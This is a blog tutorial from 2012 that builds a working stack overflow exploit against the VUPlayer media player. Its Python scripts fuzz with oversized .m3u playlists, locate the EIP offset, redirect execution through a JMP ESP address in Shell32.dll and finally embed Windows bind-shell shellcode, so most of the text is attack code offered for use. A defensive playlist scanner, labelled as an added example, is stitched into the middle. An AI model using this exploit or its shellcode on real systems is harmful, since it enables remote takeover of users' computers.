
Tuesday, February 14, 2012

STACK OVERFLOW VUPlayer

First of all, open VUPlayer, then also open OllyDbg to monitor the application that will be exploited.
Then go to BackTrack, open a console and create a fuzzer that will be used to exploit VUPlayer. The script:

#!/usr/bin/python
# Write a playlist whose only entry is 20000 "A" bytes (0x41)
file="fuzz.m3u"
buffer="\x41" * 20000
f=open(file,'w')
f.write(buffer)
f.close()

After typing the above script, run the fuzzer. Note the directory of your fuzzer, copy the .m3u file the fuzzer created and open it in VUPlayer. Then look in OllyDbg: we can see the stack filled with the character "A".
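From the defender's side, the playlist the fuzzer writes is easy to tell apart from a real one. The following scanner is an added example (not from the original post); the length threshold and the sample playlists are constructed assumptions, and it flags the traits of the fuzz file described above: a single over-long entry, one byte repeated for thousands of bytes, control bytes, or a run of 0x90 (NOP) bytes.

```python
"""Heuristic scanner for .m3u files that look like overflow probes (added example)."""
import re

MAX_ENTRY_LEN = 1024                       # assumption: no real path/URL is longer
NOP_SLED_RE = re.compile(rb"\x90{16,}")    # long run of 0x90 (x86 NOP) bytes

def scan_m3u(data: bytes, max_len: int = MAX_ENTRY_LEN) -> list:
    """Return a list of (line_no, reason) findings for a playlist body."""
    findings = []
    for no, line in enumerate(data.split(b"\n"), start=1):
        line = line.rstrip(b"\r")
        if not line or line.startswith(b"#"):      # blank line or #EXTM3U directive
            continue
        if len(line) > max_len:
            findings.append((no, f"entry length {len(line)} exceeds {max_len}"))
        # Real paths and URLs are printable text; control bytes (other than tab)
        # usually mean embedded binary data.
        nonprint = sum(1 for b in line if (b < 0x20 and b != 0x09) or b == 0x7f)
        if nonprint:
            findings.append((no, f"{nonprint} non-printable bytes"))
        if NOP_SLED_RE.search(line):
            findings.append((no, "run of 0x90 bytes (NOP sled)"))
        # One byte repeated for hundreds of bytes is classic fuzz input
        if len(line) >= 256 and len(set(line)) == 1:
            findings.append((no, f"single repeated byte {line[0]:#04x}"))
    return findings

# Constructed samples: a benign playlist, the 20000 x "A" probe from the post,
# and a file shaped like the later NOP-sled version.
BENIGN = b"#EXTM3U\nC:\\Music\\track01.mp3\n"
PROBE = b"A" * 20000 + b"\n"
SLED = b"BASSMIDI" + b"\x90" * 1004 + b"\xef\xbe\xad\xde" + b"\n"

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("probe", PROBE), ("sled", SLED)):
        print(name, scan_m3u(body))
```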






Once there is an error like the above, it is time to figure out which part of the data ends up in the EIP register. EIP is loaded with a 32-bit value that holds the address of the next instruction to execute, so this is where the address stored inside the payload will go. There are several ways to find out which bytes sent by the fuzzer overwrite the register, among others with the help of the Metasploit Framework tools.
The steps are:





After the above step, copy the output of pattern_create into the fuzzer created earlier, so the script becomes:

#!/usr/bin/python
file="fuzz.m3u"
# Output of pattern_create.rb; the full string is cut off in the original post
buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0"
#buffer="\x41" * 20000
f=open(file,'w')
f.write(buffer)
f.close()

After adding the pattern_create.rb data to your fuzzer, run the fuzzer again, copy the .m3u file it created and open it in the application to be exploited.





Different from the previous figure, the registers of the application in memory are now filled with the pattern string that was incorporated into the fuzzer.
Having managed to crash the application with the pattern data, the next step is to find at which byte of the string the overwrite happens. The registers we are interested in are EIP and ESP.
To do so, use the second tool, pattern_offset.rb.




The next customization is to change the existing buffer variable in the fuzzer so that a value we choose is written into EIP. For more details see the following script.

#!/usr/bin/python
file="fuzz.m3u"
buffer= "BASSMIDI"
buffer+= "\x90" * 1004            # padding up to the bytes that reach EIP
buffer+= "\xEF\xBE\xAD\xDE"       # DEADBEEF in little-endian byte order, lands in EIP
#buffer+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6A$
#buffer="\x41" * 20000
f=open(file,'w')
f.write(buffer)
f.close()

After writing the above script, run the fuzzer again and open the fuzz.m3u file it created in VUPlayer.





It is apparent that the value in the EIP register has changed to DEADBEEF. Next is to try writing to the area ESP points to, where ESP is the temporary data storage area in memory (the stack). To test this we customize the existing fuzzer script; for more details see the script below:

#!/usr/bin/python
file="fuzz.m3u"
buffer= "BASSMIDI"
buffer+= "\x90" * 1004
buffer+= "\xEF\xBE\xAD\xDE"
# len(buffer) is already 1016 here, so the repeat count is negative and this line adds nothing
buffer+= "\x90" * (1008-len(buffer))
buffer+= "\xCC" * (20000-len(buffer))    # INT3 breakpoints fill the rest of the 20000 bytes
#buffer+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6A$
#buffer="\x41" * 20000
f=open(file,'w')
f.write(buffer)
f.close()





Next, search for a JMP ESP instruction in the memory of the application. Follow these steps:
In OllyDbg, open the View menu and select Executable Modules.
Open the module Shell32.dll.
Then search for the JMP ESP instruction: right-click in the main window, choose Search for, then Command; a new window appears, and type JMP ESP there.





Before adding the JMP ESP address to the fuzzer script, the first thing to do is convert the address into little-endian format: 7C9D30D7 becomes \xD7\x30\x9D\x7C.

#!/usr/bin/python
file="fuzz.m3u"
buffer= "BASSMIDI"
buffer+= "\x90" * 1004
buffer+= "\xD7\x30\x9D\x7C"              # address of JMP ESP in Shell32.dll, little-endian
# len(buffer) is already 1016 here, so the repeat count is negative and this line adds nothing
buffer+= "\x90" * (1008-len(buffer))
buffer+= "\xCC" * (20000-len(buffer))    # INT3 breakpoints fill the rest of the 20000 bytes
#buffer+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6A$
#buffer="\x41" * 20000
f=open(file,'w')
f.write(buffer)
f.close()

Run the fuzzer file again in VUPlayer.





The next step is to create a payload that will be incorporated into the buffer. Later, the buffer will be sent along with the JMP ESP address through the fuzzer.
The tool used is:


 


Then open your web browser and enter the address 127.0.0.1:55555.
Once it opens, select the type of payload to use; in this case I am using the Windows Bind Shell payload. After selecting the payload type it will show the configuration of the payload you chose.



After you configure the payload, click Generate.




Copy the generated payload into the fuzzer that you created earlier:

#!/usr/bin/python
file="fuzz.m3u"
buffer="BASSMIDI"
buffer+="\x90" * 1004
buffer+="\xD7\x30\x9D\x7C"      # JMP ESP address, little-endian
buffer+="\x90" * 16             # short NOP sled before the payload ESP points at
# Payload generated above (Windows Bind Shell)
buffer+=("\x29\xc9\xb1\x51\xbb\x01\x24\x91\x2d\xdb\xd7\xd9\x74\x24\xf4\x58"
"\x31\x58\x0e\x03\x58\x0e\x83\xc1\x20\x73\xd8\x3d\x42\x98\x6e\x55"
"\x6a\xa1\x8e\x5a\xed\xd5\x1d\x80\xca\x62\x98\xf4\x99\x09\x26\x7c"
"\x9f\x1e\xa3\x33\x87\x6b\xeb\xeb\xb6\x80\x5d\x60\x8c\xdd\x5f\x98"
"\xdc\x21\xc6\xc8\x9b\x62\x8d\x17\x65\xa8\x63\x16\xa7\xc6\x88\x23"
"\x73\x3d\x59\x26\x9e\xb6\xc6\xec\x61\x22\x9e\x67\x6d\xff\xd4\x28"
"\x72\xfe\x01\xd5\xa6\x8b\x5f\xb5\x92\x97\x3e\x86\xea\x7c\xa4\x83"
"\x4e\xb3\xae\xd3\x5c\x38\xc0\xcf\xf1\xb5\x61\xe7\x57\xa2\xef\xb9"
"\x69\xde\xa0\xba\xa0\x78\x12\x22\x25\xb6\xa6\xc2\xc2\xcb\xf4\x4d"
"\x79\xd3\x29\x19\x4a\xc6\x36\xe2\x1c\xe6\x11\x4b\x14\xfd\xf8\xf2"
"\xcb\xf6\x06\xa1\x79\x05\xf8\x99\x16\xd0\x0f\xec\x4a\xb5\xf0\xd8"
"\xc6\x69\x5c\xb7\xbb\xce\x31\x74\x6f\x2e\x65\x1c\xe7\xc1\xda\x86"
"\xa4\x68\x03\xd3\x23\xcf\xde\xab\x74\x58\x20\x9d\x11\x77\x8f\x74"
"\x19\xa7\x47\xd2\x48\x66\x71\x4d\x6c\xa1\xd2\x24\x6d\x9e\xbd\x23"
"\xd8\x99\x77\xfc\x24\x73\xd7\x56\x8f\x29\x27\x86\xbc\xba\x30\x5f"
"\x05\x43\xe8\x60\x5f\xe1\xe9\x4e\x06\x60\x72\x08\xaf\x17\x17\x5d"
"\xca\xb2\xb7\x04\x3c\x8f\xb1\x51\x54\x4b\x4b\x7f\x98\x93\xb8\xd5"
"\x25\x51\x12\xd7\x98\x7a\xff\xaa\x67\xbb\x54\x1f\x3c\xd3\xd8\xa1"
"\xf0\x32\xe2\x28\xb3\xc5\xca\x89\x6c\x68\xa2\x7c\xc2\xe6\x45\x2f"
"\xb5\xa3\x14\x30\xe5\x24\x3a\x17\x03\x7b\x17\x58\xda\xe9\x67\x59"
"\xd4\x12\x47\x2e\x4c\x11\xeb\xf4\x17\x16\x3a\xa6\x28\x38\xab\x38"
"\x0f\x5b\x5f\x97\x50\x4a\x5f\xc7")
f=open(file,'w')
f.write(buffer)
f.close()

Run the fuzzer you created earlier again.





After the fuzzer has been executed successfully, run the following command:
  





Congratulations, you have successfully exploited VUPlayer ...

